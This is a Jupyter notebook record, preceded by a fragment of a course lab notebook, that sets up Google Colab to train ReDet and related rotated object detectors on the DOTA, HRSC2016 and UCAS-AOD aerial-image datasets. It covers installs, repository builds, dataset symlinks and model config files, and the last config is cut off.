"---\n\n## Laboratory 15\n\n**Examine** (click) Laboratory 15 as a webpage at [Laboratory 15.html](http://54.243.252.9/engr-1330-webroot/8-Labs/Lab15/Lab15.html)\n\n**Download** (right-click, save target as ...) Laboratory 15 as a jupyterlab notebook from [Laboratory 15.ipynb](http://54.243.252.9/engr-1330-webroot/8-Labs/Lab15/Lab15.ipynb)\n",
"_____no_output_____"
],
[
"<hr><hr>\n\n## Exercise Set 15\n\n**Examine** (click) Exercise Set 15 as a webpage at [Exercise 15.html](http://54.243.252.9/engr-1330-webroot/8-Labs/Lab15/Lab15-TH.html)\n\n**Download** (right-click, save target as ...) Exercise Set 15 as a jupyterlab notebook at [Exercise Set 7.1.ipynb](http://54.243.252.9/engr-1330-webroot/8-Labs/Lab15/Lab15-TH.ipynb)\n\n",
"_____no_output_____"
],
[
"## References",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
]
] |
cb2b5a37de4e6c5604b24a7437cb7dc35c1c59f4 | 124,627 | ipynb | Jupyter Notebook | train_UCAS_AOD.ipynb | mmoghadam11/ReDet | 917d370c827b65f0dc3618899290fd9288f30f64 | [
"Apache-2.0"
] | 1 | 2021-08-04T11:30:08.000Z | 2021-08-04T11:30:08.000Z | train_UCAS_AOD.ipynb | mmoghadam11/ReDet | 917d370c827b65f0dc3618899290fd9288f30f64 | [
"Apache-2.0"
] | null | null | null | train_UCAS_AOD.ipynb | mmoghadam11/ReDet | 917d370c827b65f0dc3618899290fd9288f30f64 | [
"Apache-2.0"
] | null | null | null | 41.877352 | 230 | 0.435748 | [
[
[
"<a href=\"https://colab.research.google.com/github/mmoghadam11/ReDet/blob/master/train_UCAS_AOD.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>",
"_____no_output_____"
]
],
[
[
"from google.colab import drive\ndrive.mount('/content/drive')",
"_____no_output_____"
],
[
"#باشد tesla t4 باید\n#اگر نبود در بخش ران تایم - منیج سشن - ترمینت شود و از اول کار شروع شود\n!nvidia-smi",
"Fri Sep 10 13:25:32 2021 \n+-----------------------------------------------------------------------------+\n| NVIDIA-SMI 470.63.01 Driver Version: 460.32.03 CUDA Version: 11.2 |\n|-------------------------------+----------------------+----------------------+\n| GPU Name Persistence-M| Bus-Id Disp.A | Volatile Uncorr. ECC |\n| Fan Temp Perf Pwr:Usage/Cap| Memory-Usage | GPU-Util Compute M. |\n| | | MIG M. |\n|===============================+======================+======================|\n| 0 Tesla K80 Off | 00000000:00:04.0 Off | 0 |\n| N/A 72C P8 32W / 149W | 0MiB / 11441MiB | 0% Default |\n| | | N/A |\n+-------------------------------+----------------------+----------------------+\n \n+-----------------------------------------------------------------------------+\n| Processes: |\n| GPU GI CI PID Type Process name GPU Memory |\n| ID ID Usage |\n|=============================================================================|\n| No running processes found |\n+-----------------------------------------------------------------------------+\n"
]
],
[
[
"# pytorch نصب",
"_____no_output_____"
]
],
[
[
"# !pip install torch=1.3.1 torchvision cudatoolkit=10.0 \n!pip install torch==1.1.0 torchvision==0.3.0",
"_____no_output_____"
]
],
[
[
"# نصب ریپازیتوری",
"_____no_output_____"
]
],
[
[
"# !git clone https://github.com/dingjiansw101/AerialDetection.git\n# !git clone https://github.com/csuhan/ReDet.git\n!git clone https://github.com/mmoghadam11/ReDet.git",
"_____no_output_____"
],
[
"%cd /content/ReDet\n! chmod +rx ./compile.sh\n!./compile.sh",
"_____no_output_____"
],
[
"!python setup.py develop\n# !pip install -e .",
"_____no_output_____"
]
],
[
[
"# نصب DOTA_devkit",
"_____no_output_____"
]
],
[
[
"! apt-get install swig\n%cd /content/ReDet/DOTA_devkit\n!swig -c++ -python polyiou.i\n!python setup.py build_ext --inplace",
"_____no_output_____"
]
],
[
[
"# حال وقت آن است که تصاویری با اندازه ۱۰۲۴*۱۰۲۴ بسازیم و حجم نهیی آن بیش از ۳۵ گیگ خواهد بود",
"_____no_output_____"
],
[
"برای تولید تصاویر بریده شدهی ۱۰۲۴×۱۰۲۴ از فایل زیر استفاده میکنیم\n\n--srcpath مکان تصاویر اصلی\n\n--dstpath مکان تصاویر خروجی\n\n**نکته : در صورت داشتن تصاویر بریده شده اجرای کد زیر نیاز نیست**",
"_____no_output_____"
]
],
[
[
"#آماده سازی dota_1024\n# %cd /content/ReDet\n# %run DOTA_devkit/prepare_dota1.py --srcpath /content/drive/Shareddrives/mahdiyar_SBU/data/dota --dstpath /content/drive/Shareddrives/mahdiyar_SBU/data/dota1024new",
"_____no_output_____"
]
],
[
[
"پس از تولید تصاویر ۱۰۲۴×۱۰۲۴ آنها را به ریپازیتوری پروژه **لینک** میکنیم",
"_____no_output_____"
]
],
[
[
"#برای مدیریت حافظ از سیمبلیک لینک کمک گرفتم\n!mkdir '/content/ReDet/data'\n# !mkdir '/content/AerialDetection/data/dota1_1024'\n# !ln -s /content/drive/Shareddrives/mahdiyar_SBU/data/dota1_1024 /content/ReDet/data\n# !ln -s /content/drive/Shareddrives/mahdiyar_SBU/data/dota1024new /content/ReDet/data\n# !ln -s /content/drive/Shareddrives/mahdiyar_SBU/data/dota_redet /content/ReDet/data\n!ln -s /content/drive/Shareddrives/mahdiyar_SBU/data/HRSC2016 /content/ReDet/data\n!ln -s /content/drive/Shareddrives/mahdiyar_SBU/data/UCAS-AOD /content/ReDet/data\n!ln -s /content/drive/Shareddrives/mahdiyar_SBU/data/UCAS_AOD659 /content/ReDet/data\n\n# !ln -s /content/drive/MyDrive/++ /content/AerialDetection/data/dota1_1024/test1024\n# !ln -s /content/drive/MyDrive/4++/trainval1024 /content/AerialDetection/data/dota1_1024/trainval1024\n\n# !unlink /content/AerialDetection/data/dota1_1024/trainval1024\n!ln -s /content/drive/MyDrive/4++/work_dirs /content/ReDet\n",
"_____no_output_____"
]
],
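[
[
"# Optional check (not part of the original notebook): list the data directory to confirm the symlinks were created\n# and point at the Drive folders.\n!ls -l /content/ReDet/data",
"_____no_output_____"
]
],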
[
[
"# بررسی حافظه",
"_____no_output_____"
]
],
[
[
"#ممکن است بار اول بعد از ۲ دقیقه خطا دهد. اگر خطا داد دوباره همین دستور اجرا شود (بار دوم خطا نمیدهد)\nimport os\n\n# print(len(os.listdir(os.path.join('/content/ReDet/data/dota1_1024/test1024/images'))))\nprint(len(os.listdir(os.path.join('/content/ReDet/data/dota1024new/test1024/images'))))",
"_____no_output_____"
],
[
"#میتوان فولدر را چک کرد(اختیاری)\n!du -c /content/AerialDetection/data/dota1_1024",
"_____no_output_____"
]
],
[
[
"# نصب mmcv",
"_____no_output_____"
]
],
[
[
"%cd /content/ReDet\n!pip install mmcv==0.2.13 #<=0.2.14\n# !pip install mmcv==0.4.3\n# !pip install mmcv==1.3.9",
"_____no_output_____"
]
],
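[
[
"# Optional check (not part of the original notebook): verify the installed mmcv version matches the pin above,\n# since the pin suggests the ReDet codebase expects the old 0.2.x API.\nimport mmcv\nprint(mmcv.__version__)",
"_____no_output_____"
]
],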
[
[
"# **configs**",
"_____no_output_____"
],
[
"نکته ی بسیار مهم در کانفیگ مدل ها تایین زمان ثبت چکپوینت هنگام آموزش، مکان دیتاست میباشد",
"_____no_output_____"
],
[
"redet config",
"_____no_output_____"
]
],
[
[
"# %pycat /content/CG-Net/configs/DOTA/faster_rcnn_RoITrans_r101_fpn_baseline.py\n%%writefile /content/ReDet/configs/ReDet/ReDet_re50_refpn_1x_dota1.py \n############باید مکان دیتاست و اسم آن در فایل کانفیگ به روز شود در بالای خط دستور تغیر یک خط علامت # گزاشته ام\n\n# model settings\nmodel = dict(\n type='ReDet',\n ############################################################################################################\n # pretrained='work_dirs/ReResNet_pretrain/re_resnet50_c8_batch256-12933bc2.pth',\n pretrained='/content/ReDet/work_dirs/ReResNet_pretrain/re_resnet50_c8_batch256-25b16846.pth',\n ############################################################################################################\n backbone=dict(\n type='ReResNet',\n depth=50,\n num_stages=4,\n out_indices=(0, 1, 2, 3),\n frozen_stages=1,\n style='pytorch'),\n neck=dict(\n type='ReFPN',\n in_channels=[256, 512, 1024, 2048],\n out_channels=256,\n num_outs=5),\n rpn_head=dict(\n type='RPNHead',\n in_channels=256,\n feat_channels=256,\n anchor_scales=[8],\n anchor_ratios=[0.5, 1.0, 2.0],\n anchor_strides=[4, 8, 16, 32, 64],\n target_means=[.0, .0, .0, .0],\n target_stds=[1.0, 1.0, 1.0, 1.0],\n loss_cls=dict(\n type='CrossEntropyLoss', use_sigmoid=True, loss_weight=1.0),\n loss_bbox=dict(type='SmoothL1Loss', beta=1.0 / 9.0, loss_weight=1.0)),\n bbox_roi_extractor=dict(\n type='SingleRoIExtractor',\n roi_layer=dict(type='RoIAlign', out_size=7, sample_num=2),\n out_channels=256,\n featmap_strides=[4, 8, 16, 32]),\n bbox_head=dict(\n type='SharedFCBBoxHeadRbbox',\n num_fcs=2,\n in_channels=256,\n fc_out_channels=1024,\n roi_feat_size=7,\n num_classes=16,\n target_means=[0., 0., 0., 0., 0.],\n target_stds=[0.1, 0.1, 0.2, 0.2, 0.1],\n reg_class_agnostic=True,\n with_module=False,\n loss_cls=dict(\n type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),\n loss_bbox=dict(type='SmoothL1Loss', beta=1.0, loss_weight=1.0)),\n rbbox_roi_extractor=dict(\n type='RboxSingleRoIExtractor',\n roi_layer=dict(type='RiRoIAlign', out_size=7, sample_num=2),\n out_channels=256,\n featmap_strides=[4, 8, 16, 32]),\n rbbox_head = dict(\n type='SharedFCBBoxHeadRbbox',\n num_fcs=2,\n in_channels=256,\n fc_out_channels=1024,\n roi_feat_size=7,\n num_classes=16,\n target_means=[0., 0., 0., 0., 0.],\n target_stds=[0.05, 0.05, 0.1, 0.1, 0.05],\n reg_class_agnostic=False,\n loss_cls=dict(\n type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),\n loss_bbox=dict(type='SmoothL1Loss', beta=1.0, loss_weight=1.0))\n )\n# model training and testing settings\ntrain_cfg = dict(\n rpn=dict(\n assigner=dict(\n type='MaxIoUAssignerCy',\n pos_iou_thr=0.7,\n neg_iou_thr=0.3,\n min_pos_iou=0.3,\n ignore_iof_thr=-1),\n sampler=dict(\n type='RandomSampler',\n num=256,\n pos_fraction=0.5,\n neg_pos_ub=-1,\n add_gt_as_proposals=False),\n allowed_border=0,\n pos_weight=-1,\n debug=False),\n rpn_proposal=dict(\n nms_across_levels=False,\n nms_pre=2000,\n nms_post=2000,\n max_num=2000,\n nms_thr=0.7,\n min_bbox_size=0),\n rcnn=[\n dict(\n assigner=dict(\n type='MaxIoUAssignerCy',\n pos_iou_thr=0.5,\n neg_iou_thr=0.5,\n min_pos_iou=0.5,\n ignore_iof_thr=-1),\n sampler=dict(\n type='RandomSampler',\n num=512,\n pos_fraction=0.25,\n neg_pos_ub=-1,\n add_gt_as_proposals=True),\n pos_weight=-1,\n debug=False),\n dict(\n assigner=dict(\n type='MaxIoUAssignerRbbox',\n pos_iou_thr=0.5,\n neg_iou_thr=0.5,\n min_pos_iou=0.5,\n ignore_iof_thr=-1),\n sampler=dict(\n type='RandomRbboxSampler',\n num=512,\n pos_fraction=0.25,\n neg_pos_ub=-1,\n 
add_gt_as_proposals=True),\n pos_weight=-1,\n debug=False)\n ])\ntest_cfg = dict(\n rpn=dict(\n # TODO: test nms 2000\n nms_across_levels=False,\n nms_pre=2000,\n nms_post=2000,\n max_num=2000,\n nms_thr=0.7,\n min_bbox_size=0),\n rcnn=dict(\n score_thr = 0.05, nms = dict(type='py_cpu_nms_poly_fast', iou_thr=0.1), max_per_img = 2000)\n)\n# dataset settings\ndataset_type = 'DOTADataset'\n########################################################################################################################\n# data_root = '/content/ReDet/data/dota1_1024/'\n# data_root = '/content/ReDet/data/dota_redet/'\ndata_root = '/content/ReDet/data/dota1024new/'\n########################################################################################################################\nimg_norm_cfg = dict(\n mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)\ndata = dict(\n imgs_per_gpu=2,\n workers_per_gpu=2,\n train=dict(\n type=dataset_type,\n ####################################################################################\n ann_file=data_root + 'trainval1024/DOTA_trainval1024.json',\n img_prefix=data_root + 'trainval1024/images',\n img_scale=(1024, 1024),\n img_norm_cfg=img_norm_cfg,\n size_divisor=32,\n flip_ratio=0.5,\n with_mask=True,\n with_crowd=True,\n with_label=True),\n val=dict(\n type=dataset_type,\n ann_file=data_root + 'trainval1024/DOTA_trainval1024.json',\n img_prefix=data_root + 'trainval1024/images',\n img_scale=(1024, 1024),\n img_norm_cfg=img_norm_cfg,\n size_divisor=32,\n flip_ratio=0,\n with_mask=True,\n with_crowd=True,\n with_label=True),\n test=dict(\n type=dataset_type,\n #############################################################################################\n ann_file=data_root + 'test1024/DOTA_test1024.json',\n # ann_file=data_root + 'val1024/DOTA_val1024.json',\n img_prefix=data_root + 'test1024/images',\n # img_prefix=data_root + 'val1024/images',\n img_scale=(1024, 1024),\n img_norm_cfg=img_norm_cfg,\n size_divisor=32,\n flip_ratio=0,\n with_mask=False,\n with_label=False,\n test_mode=True))\n ####################################################################################\n# optimizer\noptimizer = dict(type='SGD', lr=0.01, momentum=0.9, weight_decay=0.0001)\noptimizer_config = dict(grad_clip=dict(max_norm=35, norm_type=2))\n# learning policy\nlr_config = dict(\n policy='step',\n warmup='linear',\n warmup_iters=500,\n warmup_ratio=1.0 / 3,\n step=[8, 11])\ncheckpoint_config = dict(interval=12)\n# yapf:disable\nlog_config = dict(\n interval=50,\n hooks=[\n dict(type='TextLoggerHook'),\n ####################################################################################\n dict(type='TensorboardLoggerHook')\n ])\n# yapf:enable\n# runtime settings\ntotal_epochs = 12\ndist_params = dict(backend='nccl')\nlog_level = 'INFO'\nwork_dir = './work_dirs/ReDet_re50_refpn_1x_dota1'\nload_from = None\nresume_from = None\nworkflow = [('train', 1)]\n\n############################################################################################\n# map: 0.7625466854468368\n# classaps: [88.78856374 82.64427543 53.97022743 73.99912889 78.12618094 84.05574561\n# 88.03844621 90.88860051 87.78155929 85.75268025 61.76308434 60.39378975\n# 75.9600904 68.06737265 63.59028274]",
"_____no_output_____"
]
],
[
[
"**HRSC2016** ReDet",
"_____no_output_____"
]
],
[
[
"%%writefile /content/ReDet/configs/ReDet/ReDet_re50_refpn_3x_hrsc2016.py\n\n# model settings\nmodel = dict(\n type='ReDet',\n pretrained='/content/ReDet/work_dirs/ReResNet_pretrain/re_resnet50_c8_batch256-25b16846.pth',\n backbone=dict(\n type='ReResNet',\n depth=50,\n num_stages=4,\n out_indices=(0, 1, 2, 3),\n frozen_stages=1,\n style='pytorch'),\n neck=dict(\n type='ReFPN',\n in_channels=[256, 512, 1024, 2048],\n out_channels=256,\n num_outs=5),\n rpn_head=dict(\n type='RPNHead',\n in_channels=256,\n feat_channels=256,\n anchor_scales=[8],\n anchor_ratios=[0.5, 1.0, 2.0],\n anchor_strides=[4, 8, 16, 32, 64],\n target_means=[.0, .0, .0, .0],\n target_stds=[1.0, 1.0, 1.0, 1.0],\n loss_cls=dict(\n type='CrossEntropyLoss', use_sigmoid=True, loss_weight=1.0),\n loss_bbox=dict(type='SmoothL1Loss', beta=1.0 / 9.0, loss_weight=1.0)),\n bbox_roi_extractor=dict(\n type='SingleRoIExtractor',\n roi_layer=dict(type='RoIAlign', out_size=7, sample_num=2),\n out_channels=256,\n featmap_strides=[4, 8, 16, 32]),\n bbox_head=dict(\n type='SharedFCBBoxHeadRbbox',\n num_fcs=2,\n in_channels=256,\n fc_out_channels=1024,\n roi_feat_size=7,\n num_classes=2,\n target_means=[0., 0., 0., 0., 0.],\n target_stds=[0.1, 0.1, 0.2, 0.2, 0.1],\n reg_class_agnostic=True,\n with_module=False,\n loss_cls=dict(\n type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),\n loss_bbox=dict(type='SmoothL1Loss', beta=1.0, loss_weight=1.0)),\n rbbox_roi_extractor=dict(\n type='RboxSingleRoIExtractor',\n roi_layer=dict(type='RiRoIAlign', out_size=7, sample_num=2),\n out_channels=256,\n featmap_strides=[4, 8, 16, 32]),\n rbbox_head = dict(\n type='SharedFCBBoxHeadRbbox',\n num_fcs=2,\n in_channels=256,\n fc_out_channels=1024,\n roi_feat_size=7,\n num_classes=2,\n target_means=[0., 0., 0., 0., 0.],\n target_stds=[0.05, 0.05, 0.1, 0.1, 0.05],\n reg_class_agnostic=False,\n loss_cls=dict(\n type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),\n loss_bbox=dict(type='SmoothL1Loss', beta=1.0, loss_weight=1.0))\n )\n# model training and testing settings\ntrain_cfg = dict(\n rpn=dict(\n assigner=dict(\n type='MaxIoUAssignerCy',\n pos_iou_thr=0.7,\n neg_iou_thr=0.3,\n min_pos_iou=0.3,\n ignore_iof_thr=-1),\n sampler=dict(\n type='RandomSampler',\n num=256,\n pos_fraction=0.5,\n neg_pos_ub=-1,\n add_gt_as_proposals=False),\n allowed_border=0,\n pos_weight=-1,\n debug=False),\n rpn_proposal=dict(\n nms_across_levels=False,\n nms_pre=2000,\n nms_post=2000,\n max_num=2000,\n nms_thr=0.7,\n min_bbox_size=0),\n rcnn=[\n dict(\n assigner=dict(\n type='MaxIoUAssignerCy',\n pos_iou_thr=0.5,\n neg_iou_thr=0.5,\n min_pos_iou=0.5,\n ignore_iof_thr=-1),\n sampler=dict(\n type='RandomSampler',\n num=512,\n pos_fraction=0.25,\n neg_pos_ub=-1,\n add_gt_as_proposals=True),\n pos_weight=-1,\n debug=False),\n dict(\n assigner=dict(\n type='MaxIoUAssignerRbbox',\n pos_iou_thr=0.5,\n neg_iou_thr=0.5,\n min_pos_iou=0.5,\n ignore_iof_thr=-1),\n sampler=dict(\n type='RandomRbboxSampler',\n num=512,\n pos_fraction=0.25,\n neg_pos_ub=-1,\n add_gt_as_proposals=True),\n pos_weight=-1,\n debug=False)\n ])\ntest_cfg = dict(\n rpn=dict(\n # TODO: test nms 2000\n nms_across_levels=False,\n nms_pre=2000,\n nms_post=2000,\n max_num=2000,\n nms_thr=0.7,\n min_bbox_size=0),\n rcnn=dict(\n score_thr = 0.05, nms = dict(type='py_cpu_nms_poly_fast', iou_thr=0.1), max_per_img = 2000)\n)\n# dataset settings\ndataset_type = 'HRSCL1Dataset'\n###################################################################################\ndata_root = 
'/content/ReDet/data/HRSC2016/'########################################\n###################################################################################\nimg_norm_cfg = dict(\n mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)\ndata = dict(\n imgs_per_gpu=2,\n workers_per_gpu=2,\n train=dict(\n type=dataset_type,\n ann_file=data_root + 'Train/HRSC_L1_train.json',\n img_prefix=data_root + 'Train/images/',\n img_scale=(800, 512),\n img_norm_cfg=img_norm_cfg,\n size_divisor=32,\n flip_ratio=0.5,\n with_mask=True,\n with_crowd=True,\n with_label=True),\n val=dict(\n type=dataset_type,\n ann_file=data_root + 'Test/HRSC_L1_test.json',\n img_prefix=data_root + 'Test/images/',\n img_scale=(800, 512),\n img_norm_cfg=img_norm_cfg,\n size_divisor=32,\n flip_ratio=0,\n with_mask=True,\n with_crowd=True,\n with_label=True),\n test=dict(\n type=dataset_type,\n ann_file=data_root + 'Test/HRSC_L1_test.json',\n img_prefix=data_root + 'Test/images/',\n img_scale=(800, 512),\n img_norm_cfg=img_norm_cfg,\n size_divisor=32,\n flip_ratio=0,\n with_mask=False,\n with_label=False,\n test_mode=True))\n# optimizer\noptimizer = dict(type='SGD', lr=0.01, momentum=0.9, weight_decay=0.0001)\noptimizer_config = dict(grad_clip=dict(max_norm=35, norm_type=2))\n# learning policy\nlr_config = dict(\n policy='step',\n warmup='linear',\n warmup_iters=500,\n warmup_ratio=1.0 / 3,\n step=[24, 33])\ncheckpoint_config = dict(interval=1)\n# yapf:disable\nlog_config = dict(\n interval=1,\n hooks=[\n dict(type='TextLoggerHook'),\n dict(type='TensorboardLoggerHook')\n ])\n# yapf:enable\n# runtime settings\ntotal_epochs = 36\ndist_params = dict(backend='nccl')\nlog_level = 'INFO'\nwork_dir = '/content/ReDet/work_dirs/ReDet_re50_refpn_3x_hrsc2016'\nload_from = None\nresume_from = None\nworkflow = [('train', 1)]\n\n# VOC2007 metrics\n# AP50: 90.46 AP75: 89.46 mAP: 70.41",
"_____no_output_____"
]
],
[
[
"faster_rcnn_RoITrans_r50_fpn_1x_dota config",
"_____no_output_____"
]
],
[
[
"# %pycat /content/ReDet/configs/DOTA/faster_rcnn_RoITrans_r50_fpn_1x_dota.py\n%%writefile /content/ReDet/configs/DOTA/faster_rcnn_RoITrans_r50_fpn_1x_dota.py\n##########این کانفیگ از ریپازیتوری اصلی کپی شده\n\n# model settings\nmodel = dict(\n type='RoITransformer',\n pretrained='modelzoo://resnet50',\n backbone=dict(\n type='ResNet',\n depth=50,\n num_stages=4,\n out_indices=(0, 1, 2, 3),\n frozen_stages=1,\n style='pytorch'),\n neck=dict(\n type='FPN',\n in_channels=[256, 512, 1024, 2048],\n out_channels=256,\n num_outs=5),\n rpn_head=dict(\n type='RPNHead',\n in_channels=256,\n feat_channels=256,\n anchor_scales=[8],\n anchor_ratios=[0.5, 1.0, 2.0],\n anchor_strides=[4, 8, 16, 32, 64],\n target_means=[.0, .0, .0, .0],\n target_stds=[1.0, 1.0, 1.0, 1.0],\n loss_cls=dict(\n type='CrossEntropyLoss', use_sigmoid=True, loss_weight=1.0),\n loss_bbox=dict(type='SmoothL1Loss', beta=1.0 / 9.0, loss_weight=1.0)),\n bbox_roi_extractor=dict(\n type='SingleRoIExtractor',\n roi_layer=dict(type='RoIAlign', out_size=7, sample_num=2),\n out_channels=256,\n featmap_strides=[4, 8, 16, 32]),\n bbox_head=dict(\n type='SharedFCBBoxHeadRbbox',\n num_fcs=2,\n in_channels=256,\n fc_out_channels=1024,\n roi_feat_size=7,\n num_classes=16,\n target_means=[0., 0., 0., 0., 0.],\n target_stds=[0.1, 0.1, 0.2, 0.2, 0.1],\n reg_class_agnostic=True,\n with_module=False,\n loss_cls=dict(\n type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),\n loss_bbox=dict(type='SmoothL1Loss', beta=1.0, loss_weight=1.0)),\n rbbox_roi_extractor=dict(\n type='RboxSingleRoIExtractor',\n roi_layer=dict(type='RoIAlignRotated', out_size=7, sample_num=2),\n out_channels=256,\n featmap_strides=[4, 8, 16, 32]),\n rbbox_head = dict(\n type='SharedFCBBoxHeadRbbox',\n num_fcs=2,\n in_channels=256,\n fc_out_channels=1024,\n roi_feat_size=7,\n num_classes=16,\n target_means=[0., 0., 0., 0., 0.],\n target_stds=[0.05, 0.05, 0.1, 0.1, 0.05],\n reg_class_agnostic=False,\n loss_cls=dict(\n type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),\n loss_bbox=dict(type='SmoothL1Loss', beta=1.0, loss_weight=1.0))\n )\n# model training and testing settings\ntrain_cfg = dict(\n rpn=dict(\n assigner=dict(\n type='MaxIoUAssignerCy',\n pos_iou_thr=0.7,\n neg_iou_thr=0.3,\n min_pos_iou=0.3,\n ignore_iof_thr=-1),\n sampler=dict(\n type='RandomSampler',\n num=256,\n pos_fraction=0.5,\n neg_pos_ub=-1,\n add_gt_as_proposals=False),\n allowed_border=0,\n pos_weight=-1,\n debug=False),\n rpn_proposal=dict(\n nms_across_levels=False,\n nms_pre=2000,\n nms_post=2000,\n max_num=2000,\n nms_thr=0.7,\n min_bbox_size=0),\n rcnn=[\n dict(\n assigner=dict(\n type='MaxIoUAssignerCy',\n pos_iou_thr=0.5,\n neg_iou_thr=0.5,\n min_pos_iou=0.5,\n ignore_iof_thr=-1),\n sampler=dict(\n type='RandomSampler',\n num=512,\n pos_fraction=0.25,\n neg_pos_ub=-1,\n add_gt_as_proposals=True),\n pos_weight=-1,\n debug=False),\n dict(\n assigner=dict(\n type='MaxIoUAssignerRbbox',\n pos_iou_thr=0.5,\n neg_iou_thr=0.5,\n min_pos_iou=0.5,\n ignore_iof_thr=-1),\n sampler=dict(\n type='RandomRbboxSampler',\n num=512,\n pos_fraction=0.25,\n neg_pos_ub=-1,\n add_gt_as_proposals=True),\n pos_weight=-1,\n debug=False)\n ])\ntest_cfg = dict(\n rpn=dict(\n # TODO: test nms 2000\n nms_across_levels=False,\n nms_pre=2000,\n nms_post=2000,\n max_num=2000,\n nms_thr=0.7,\n min_bbox_size=0),\n rcnn=dict(\n # score_thr=0.05, nms=dict(type='py_cpu_nms_poly_fast', iou_thr=0.1), max_per_img=1000)\n score_thr = 0.05, nms = dict(type='py_cpu_nms_poly_fast', iou_thr=0.1), max_per_img = 2000)\n # 
score_thr = 0.001, nms = dict(type='pesudo_nms_poly', iou_thr=0.9), max_per_img = 2000)\n # score_thr = 0.001, nms = dict(type='py_cpu_nms_poly_fast', iou_thr=0.1), max_per_img = 2000)\n\n# soft-nms is also supported for rcnn testing\n # e.g., nms=dict(type='soft_nms', iou_thr=0.5, min_score=0.05)\n)\n# dataset settings\ndataset_type = 'DOTADataset'\n######################################################################################################################\n# data_root = '/content/ReDet/data/dota1_1024/'\n# data_root = '/content/ReDet/data/dota_redet/'\ndata_root = '/content/ReDet/data/dota1024new/'\n######################################################################################################################\nimg_norm_cfg = dict(\n mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)\ndata = dict(\n imgs_per_gpu=2,\n workers_per_gpu=2,\n train=dict(\n type=dataset_type,\n ann_file=data_root + 'trainval1024/DOTA_trainval1024.json',\n img_prefix=data_root + 'trainval1024/images/',\n img_scale=(1024, 1024),\n img_norm_cfg=img_norm_cfg,\n size_divisor=32,\n flip_ratio=0.5,\n with_mask=True,\n with_crowd=True,\n with_label=True),\n val=dict(\n type=dataset_type,\n ann_file=data_root + 'trainval1024/DOTA_trainval1024.json',\n img_prefix=data_root + 'trainval1024/images',\n img_scale=(1024, 1024),\n img_norm_cfg=img_norm_cfg,\n size_divisor=32,\n flip_ratio=0,\n with_mask=True,\n with_crowd=True,\n with_label=True),\n test=dict(\n type=dataset_type,\n #############################################################################################\n ann_file=data_root + 'test1024/DOTA_test1024.json',\n # ann_file=data_root + 'val1024/DOTA_val1024.json',\n img_prefix=data_root + 'test1024/images',\n # img_prefix=data_root + 'val1024/images',\n # ann_file=data_root + 'test1024_ms/DOTA_test1024_ms.json',\n # img_prefix=data_root + 'test1024_ms/images',\n img_scale=(1024, 1024),\n img_norm_cfg=img_norm_cfg,\n size_divisor=32,\n flip_ratio=0,\n with_mask=False,\n with_label=False,\n test_mode=True))\n# optimizer\noptimizer = dict(type='SGD', lr=0.01, momentum=0.9, weight_decay=0.0001)\noptimizer_config = dict(grad_clip=dict(max_norm=35, norm_type=2))\n# learning policy\nlr_config = dict(\n policy='step',\n warmup='linear',\n warmup_iters=500,\n warmup_ratio=1.0 / 3,\n step=[8, 11])\ncheckpoint_config = dict(interval=1)\n# yapf:disable\nlog_config = dict(\n interval=50,\n hooks=[\n dict(type='TextLoggerHook'),\n # dict(type='TensorboardLoggerHook')\n ])\n# yapf:enable\n# runtime settings\ntotal_epochs = 12\ndist_params = dict(backend='nccl')\nlog_level = 'INFO'\nwork_dir = './work_dirs/faster_rcnn_RoITrans_r50_fpn_1x_dota'\nload_from = None\nresume_from = None\nworkflow = [('train', 1)]",
"_____no_output_____"
]
],
[
[
"faster_rcnn_obb_r50_fpn_1x_dota config",
"_____no_output_____"
]
],
[
[
"# %pycat /content/ReDet/configs/DOTA/faster_rcnn_obb_r50_fpn_1x_dota.py\n%%writefile /content/ReDet/configs/UCAS_AOD/faster_rcnn_RoITrans_r50_fpn_3x_UCAS_AOD.py\n##########این کانفیگ از ریپازیتوری اصلی کپی شده\n\n\n\n# model settings\nmodel = dict(\n type='FasterRCNNOBB',\n pretrained='modelzoo://resnet50',\n backbone=dict(\n type='ResNet',\n depth=50,\n num_stages=4,\n out_indices=(0, 1, 2, 3),\n frozen_stages=1,\n style='pytorch'),\n neck=dict(\n type='FPN',\n in_channels=[256, 512, 1024, 2048],\n out_channels=256,\n num_outs=5),\n rpn_head=dict(\n type='RPNHead',\n in_channels=256,\n feat_channels=256,\n anchor_scales=[8],\n anchor_ratios=[0.5, 1.0, 2.0],\n anchor_strides=[4, 8, 16, 32, 64],\n target_means=[.0, .0, .0, .0],\n target_stds=[1.0, 1.0, 1.0, 1.0],\n loss_cls=dict(\n type='CrossEntropyLoss', use_sigmoid=True, loss_weight=1.0),\n loss_bbox=dict(type='SmoothL1Loss', beta=1.0 / 9.0, loss_weight=1.0)),\n bbox_roi_extractor=dict(\n type='SingleRoIExtractor',\n roi_layer=dict(type='RoIAlign', out_size=7, sample_num=2),\n out_channels=256,\n featmap_strides=[4, 8, 16, 32]),\n bbox_head=dict(\n type='SharedFCBBoxHeadRbbox',\n num_fcs=2,\n in_channels=256,\n fc_out_channels=1024,\n roi_feat_size=7,\n num_classes=16,\n target_means=[0., 0., 0., 0., 0.],\n target_stds=[0.1, 0.1, 0.2, 0.2, 0.1],\n reg_class_agnostic=False,\n with_module=False,\n hbb_trans='hbbpolyobb',\n loss_cls=dict(\n 